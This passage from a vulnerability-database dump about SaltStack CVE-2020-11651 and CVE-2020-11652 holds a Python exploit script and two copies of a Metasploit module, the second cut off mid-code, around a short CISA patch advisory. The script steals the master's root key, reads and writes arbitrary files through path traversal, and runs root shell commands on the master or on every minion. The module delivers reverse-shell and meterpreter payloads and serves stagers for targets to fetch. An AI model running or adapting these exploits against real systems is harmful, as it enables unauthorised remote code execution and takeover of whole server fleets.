sys\nimport time\n\nimport salt\nimport salt.version\nimport salt.transport.client\nimport salt.exceptions\n\ndef init_minion(master_ip, master_port):\n minion_config = {\n 'transport': 'zeromq',\n 'pki_dir': '/tmp',\n 'id': 'root',\n 'log_level': 'debug',\n 'master_ip': master_ip,\n 'master_port': master_port,\n 'auth_timeout': 5,\n 'auth_tries': 1,\n 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\n }\n\n return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\n\n# --- check funcs ----\n\ndef check_salt_version():\n print(\"[+] Salt version: {}\".format(salt.version.__version__))\n\n vi = salt.version.__version_info__\n\n if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):\n return True\n else:\n return False\n\ndef check_connection(master_ip, master_port, channel):\n print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\n sys.stdout.flush()\n\n # connection check\n try:\n channel.send({'cmd':'ping'}, timeout=2)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"OFFLINE\")\n sys.exit(1)\n else:\n print(\"ONLINE\")\n\ndef check_CVE_2020_11651(channel):\n print(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='')\n sys.stdout.flush()\n # try to evil\n try:\n rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"YES\")\n except:\n print(\"ERROR\")\n raise\n else:\n pass\n finally:\n if rets:\n root_key = rets[2]['root']\n return root_key\n\n return None\n\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'cmd': 'get_token',\n 'arg': [],\n 'token': top_secret_file_path,\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"YES\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n print(\"NO\")\n \ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.read',\n 'path': top_secret_file_path,\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n if rets['data']['return']:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.write',\n 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\n 'data': 'evil',\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n\n pp(rets)\n if rets['data']['return'].startswith('Wrote'):\n try:\n os.remove('/tmp/salt_CVE_2020_11652')\n except OSError:\n print(\"Maybe?\")\n else:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'config.update_config',\n 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\n 'yaml_contents': 'evil',\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n if rets['data']['return'].startswith('Wrote'):\n try:\n os.remove('/tmp/salt_CVE_2020_11652.conf')\n except OSError:\n print(\"Maybe?\")\n else:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef pwn_read_file(channel, root_key, path, master_ip):\n print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.read',\n 'path': path,\n 'saltenv': 'base',\n }\n\n rets = channel.send(msg, timeout=3)\n print(rets['data']['return'][0][path])\n\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\n print(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip))\n sys.stdout.flush()\n\n try:\n fh = open(src, 'rb')\n payload = fh.read()\n fh.close()\n except Exception as e:\n print('[-] Failed to read {}: {}'.format(src, e))\n return\n\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.write',\n 'saltenv': 'base',\n 'data': payload,\n 'path': dest,\n }\n\n rets = channel.send(msg, timeout=3)\n print('[ ] {}'.format(rets['data']['return']))\n\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\n print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': 'runner',\n 'fun': 'salt.cmd',\n 'saltenv': 'base',\n 'user': 'sudo_user',\n 'kwarg': {\n 'fun': 'cmd.exec_code',\n 'lang': 'python',\n 'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\n },\n 'jid': jid,\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except Exception as e:\n print('[-] Failed to submit job')\n return\n\n if rets.get('jid'):\n print('[+] Successfully scheduled job: {}'.format(rets['jid']))\n\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\n print(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': '_send_pub',\n 'fun': 'cmd.run',\n 'user': 'root',\n 'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\n 'tgt': '*',\n 'tgt_type': 'glob',\n 'ret': '',\n 'jid': jid\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except Exception as e:\n print('[-] Failed to submit job')\n return\n finally:\n if rets == None:\n print('[+] Successfully submitted job to all minions.')\n else:\n print('[-] Failed to submit job')\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')\n parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\n parser.add_argument('--port', '-p', dest='master_port', default='4506')\n parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\n parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')\n parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\n parser.add_argument('--read', '-r', dest='read_file')\n parser.add_argument('--upload-src', dest='upload_src')\n parser.add_argument('--upload-dest', dest='upload_dest')\n parser.add_argument('--exec', dest='exec', help='Run a command on the master')\n parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\n args = parser.parse_args()\n\n print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\")\n time.sleep(1)\n\n # Both src and destination are required for uploads\n if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\n print('[-] Must provide both --upload-src and --upload-dest')\n sys.exit(1)\n\n channel = init_minion(args.master_ip, args.master_port)\n\n if check_salt_version():\n print(\"[ ] This version of salt is vulnerable! Check results below\")\n elif args.force:\n print(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\")\n else:\n sys.exit()\n\n check_connection(args.master_ip, args.master_port, channel)\n \n root_key = check_CVE_2020_11651(channel)\n if root_key:\n print('\\n[*] root key obtained: {}'.format(root_key))\n else:\n print('[-] Failed to find root key...aborting')\n sys.exit(127)\n\n if args.run_checks:\n # Assuming this check runs on the master itself, create a file with \"secret\" content\n # and abuse CVE-2020-11652 to read it.\n top_secret_file_path = '/tmp/salt_cve_teta'\n with salt.utils.fopen(top_secret_file_path, 'w') as fd:\n fd.write(\"top secret\")\n\n # Again, this assumes we're running this check on the master itself\n with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\n root_key = keyfd.read()\n\n check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\n check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\n check_CVE_2020_11652_write1(debug, channel, root_key)\n check_CVE_2020_11652_write2(debug, channel, root_key)\n os.remove(top_secret_file_path)\n sys.exit(0)\n\n if args.read_file:\n pwn_read_file(channel, root_key, args.read_file, args.master_ip)\n\n if args.upload_src:\n if os.path.isabs(args.upload_dest):\n print('[-] Destination path must be relative; aborting')\n sys.exit(1)\n pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\n\n\n jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\n\n if args.exec:\n pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\n\n if args.exec_all:\n print(\"[!] Lester, is this what you want? Hit ^C to abort.\")\n time.sleep(2)\n pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/34389", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-18T21:23:51", "description": "This Metasploit module exploits unauthenticated access to the runner() and _send_pub() methods in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to execute code as root on either the master or on select minions. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T00:00:00", "type": "zdt", "title": "SaltStack Salt Master/Minion Unauthenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-12T00:00:00", "id": "1337DAY-ID-34423", "href": "https://0day.today/exploit/description/34423", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE',\n 'Description' => %q{\n This module exploits unauthenticated access to the runner() and\n _send_pub() methods in the SaltStack Salt master's ZeroMQ request\n server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to\n execute code as root on either the master or on select minions.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are\n known to be affected by the Salt vulnerabilities.\n\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Master (Python payload)',\n 'Description' => 'Executing Python payload on the master',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n ],\n [\n 'Master (Unix command)',\n 'Description' => 'Executing Unix command on the master',\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n ],\n [\n 'Minions (Python payload)',\n 'Description' => 'Executing Python payload on the minions',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n ],\n [\n 'Minions (Unix command)',\n 'Description' => 'Executing Unix command on the minions',\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n # cmd/unix/reverse_python_ssl crashes in this target\n 'PAYLOAD' => 'cmd/unix/reverse_python'\n }\n ]\n ],\n 'DefaultTarget' => 0, # Defaults to master for safety\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key'\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506),\n OptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', /.*/])\n ])\n\n register_advanced_options([\n OptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10])\n ])\n\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\n import_target_defaults\n end\n\n # NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key\n\n def exploit\n # check.reason is from auxiliary/gather/saltstack_salt_root_key\n if target.name.start_with?('Master')\n unless (root_key = check.reason)\n fail_with(Failure::BadConfig,\n \"#{target['Description']} requires a root key\")\n end\n\n print_good(\"Successfully obtained root key: #{root_key}\")\n end\n\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n print_status(\"#{target['Description']}: #{datastore['PAYLOAD']}\")\n\n case target.name\n when /^Master/\n yeet_runner(root_key)\n when /^Minions/\n yeet_send_pub\n end\n\n # HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one\n sleep(wfs_delay)\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_runner(root_key)\n print_status(\"Yeeting runner() at #{peer}\")\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951\n runner = {\n 'cmd' => 'runner',\n # https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd\n 'fun' => 'salt.cmd',\n 'kwarg' => {\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet'\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'key' => root_key # No JID needed, only the root key!\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n runner['kwarg'].merge!(\n 'fun' => 'cmd.exec_code',\n 'lang' => payload.arch.first,\n 'code' => payload.encoded\n )\n when :unix_command\n # HTTPS doesn't appear to be supported by the server :(\n print_status(\"Serving intermediate stager over HTTP: #{start_service}\")\n\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script\n runner['kwarg'].merge!(\n # cmd.run doesn't work due to a missing argument error, so we use this\n 'fun' => 'cmd.script',\n 'source' => get_uri,\n 'stdin' => payload.encoded\n )\n end\n\n vprint_status(\"Unserialized clear load: #{runner}\")\n zmq_send_message(serialize_clear_load(runner))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive runner() response')\n end\n\n vprint_good(\"Received runner() response: #{res.inspect}\")\n end\n\n def yeet_send_pub\n print_status(\"Yeeting _send_pub() at #{peer}\")\n\n # NOTE: A unique JID (job ID) is needed for every published job\n jid = generate_jid\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151\n send_pub = {\n 'cmd' => '_send_pub',\n 'kwargs' => {\n 'bg' => true,\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet',\n 'show_jid' => false,\n 'show_timeout' => false\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'tgt' => datastore['MINIONS'].source,\n 'tgt_type' => 'pcre',\n 'jid' => jid\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n send_pub.merge!(\n 'fun' => 'cmd.exec_code',\n 'arg' => [payload.arch.first, payload.encoded]\n )\n when :unix_command\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run\n send_pub.merge!(\n 'fun' => 'cmd.run',\n 'arg' => [payload.encoded]\n )\n end\n\n vprint_status(\"Unserialized clear load: #{send_pub}\")\n zmq_send_message(serialize_clear_load(send_pub))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive _send_pub() response')\n end\n\n vprint_good(\"Received _send_pub() response: #{res.inspect}\")\n\n # NOTE: This path will likely change between platforms and distros\n register_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\")\n end\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py\n # https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py\n def generate_jid\n DateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N')\n end\n\n # HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP\n def stager_instance\n nil\n end\n\n # HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP\n def exe\n # NOTE: The shebang line is necessary in this case!\n <<~SHELL\n #!/bin/sh\n /bin/sh\n SHELL\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34423", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:48", "description": "SaltStack has released a security update to address critical vulnerabilities affecting Salt versions prior to 2019.2.4 and 3000.2. Salt is an open-source remote task and configuration management framework widely used in data centers and cloud servers. A remote attacker could exploit these vulnerabilities to take control of an affected system. These vulnerabilities were detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following SaltStack products and apply the necessary update as soon as possible: \n\n * Release Notes for [Salt 2019.2.4](<https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html>) and [Salt 3000.2](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>)\n * Blog on [Critical Vulnerabilities Update: CVE-2020-11651 and CVE-2020-11652 ](<https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/ >)\n * Tips on [Hardening Salt](<https://docs.saltstack.com/en/latest/topics/hardening.html#general-hardening-tip>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/05/01/saltstack-patches-critical-vulnerabilities-salt>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-01T00:00:00", "type": "cisa", "title": "SaltStack Patches Critical Vulnerabilities in Salt", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-04T00:00:00", "id": "CISA:6A06982A8847F277D71953FBD9CA4A0E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/05/01/saltstack-patches-critical-vulnerabilities-salt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-02T10:49:39", "description": "This module exploits unauthenticated access to the runner() and _send_pub() methods in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to execute code as root on either the master or on select minions. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.\n", "cvss3": {}, "published": "2020-05-11T17:05:38", "type": "metasploit", "title": "SaltStack Salt Master/Minion Unauthenticated RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2021-09-17T21:34:46", "id": "MSF:EXPLOIT-LINUX-MISC-SALTSTACK_SALT_UNAUTH_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/saltstack_salt_unauth_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE',\n 'Description' => %q{\n This module exploits unauthenticated access to the runner() and\n _send_pub() methods in the SaltStack Salt master's ZeroMQ request\n server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to\n execute code as root on either the master or on select minions.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as\n well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual\n Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,\n 1.3, 1.5, and 1.6 in certain configurations, are known to be affected\n by the Salt vulnerabilities.\n\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Master (Python payload)',\n {\n 'Description' => 'Executing Python payload on the master',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'Master (Unix command)',\n {\n 'Description' => 'Executing Unix command on the master',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Minions (Python payload)',\n {\n 'Description' => 'Executing Python payload on the minions',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'Minions (Unix command)',\n {\n 'Description' => 'Executing Unix command on the minions',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n # cmd/unix/reverse_python_ssl crashes in this target\n 'PAYLOAD' => 'cmd/unix/reverse_python'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0, # Defaults to master for safety\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key'\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506),\n OptString.new('ROOT_KEY', [false, \"Master's root key if you have it\"]),\n OptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', '.*'])\n ])\n\n register_advanced_options([\n OptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10])\n ])\n end\n\n # NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key\n\n def exploit\n if target.name.start_with?('Master')\n if (root_key = datastore['ROOT_KEY'])\n print_status(\"User-specified root key: #{root_key}\")\n else\n # check.reason is from auxiliary/gather/saltstack_salt_root_key\n root_key = check.reason\n end\n\n unless root_key\n fail_with(Failure::BadConfig,\n \"#{target['Description']} requires a root key\")\n end\n end\n\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n print_status(\"#{target['Description']}: #{datastore['PAYLOAD']}\")\n\n case target.name\n when /^Master/\n yeet_runner(root_key)\n when /^Minions/\n yeet_send_pub\n end\n\n # HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one\n sleep(wfs_delay)\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_runner(root_key)\n print_status(\"Yeeting runner() at #{peer}\")\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951\n runner = {\n 'cmd' => 'runner',\n # https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd\n 'fun' => 'salt.cmd',\n 'kwarg' => {\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet'\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'key' => root_key # No JID needed, only the root key!\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n runner['kwarg'].merge!(\n 'fun' => 'cmd.exec_code',\n 'lang' => payload.arch.first,\n 'code' => payload.encoded\n )\n when :unix_cmd\n # HTTPS doesn't appear to be supported by the server :(\n print_status(\"Serving intermediate stager over HTTP: #{start_service}\")\n\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script\n runner['kwarg'].merge!(\n # cmd.run doesn't work due to a missing argument error, so we use this\n 'fun' => 